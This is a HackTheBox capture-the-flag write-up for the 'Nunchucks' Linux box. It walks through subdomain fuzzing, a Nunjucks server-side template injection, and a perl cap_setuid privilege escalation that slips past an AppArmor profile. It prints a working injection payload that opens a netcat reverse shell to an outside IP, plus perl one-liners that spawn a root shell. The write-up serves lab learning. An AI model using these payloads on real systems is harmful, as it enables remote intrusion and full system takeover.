Nunchucks
An easy Linux box from HackTheBox, using an SSTI to get initial access, and a work around how AppArmor works with perl to get root.
Nunchucks
Recon
Running the usual nmap, see there is a website on port 80
There is no ability to signup, despite there being a page for it
gobuster doesn’t return anything interesting either with the medium wordlist
Try to enumerate subdomains with wfuzz, -hh for filtering char length, specifying what I’m fuzzing with the Host header
sudo wfuzz -H "Host: FUZZ.nunchucks.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 30587 https://nunchucks.htb
It finds the store subdomain, when we navigate to it (after adding it to hosts file), the page looks like
When you submit an email, it reflects the input
Trying template injection, see that it works as it evaluates 10x2
Using burp to identify the technology with the reply HTTP message, can see that the site uses Express (with nodejs)
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 May 2022 23:58:20 GMT
Connection: close
X-Powered-By: Express
ETag: W/"fbd-udK+KYlYFVN2Nn2DXdm1EXd8mv0"
Using the hacktricks template injection section, find that the templating system it uses is Nunjucks (haha) by fingerprinting with {{foo}} payload outputting nothing
Exploitation
Can inject in a way that executes system commands, and getting a reverse shell using the netcat on the system
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 6767 >/tmp/f')\")()}}"}
With the reverse shell run linpeas, it finds that perl has setuid priveledges
/usr/bin/perl = cap_setuid+ep
So to exploit, just run a set uid = 0 with a one liner
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
But it doesn’t work, because the root directory is being protected by apparmor in /etc/apparmor.d/usr.bin.perl - found by linpeas but I didnt see it and though I was being a moron
/usr/bin/perl {
#include <abstractions/base>
#include <abstractions/nameservice>
#include <abstractions/perl>
capability setuid,
deny owner /etc/nsswitch.conf r,
deny /root/* rwx,
deny /etc/shadow rwx,
/usr/bin/id mrix,
/usr/bin/ls mrix,
/usr/bin/cat mrix,
/usr/bin/whoami mrix,
/opt/backup.pl mrix,
owner /home/ r,
owner /home/david/ r,
}
However there is a bypass that when you run perl with a shebang in a script, it doesn’t restrict you, and you can spawn a shell
#!/usr/bin/perl
use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";
Then making it executable with chmod and executing gives you root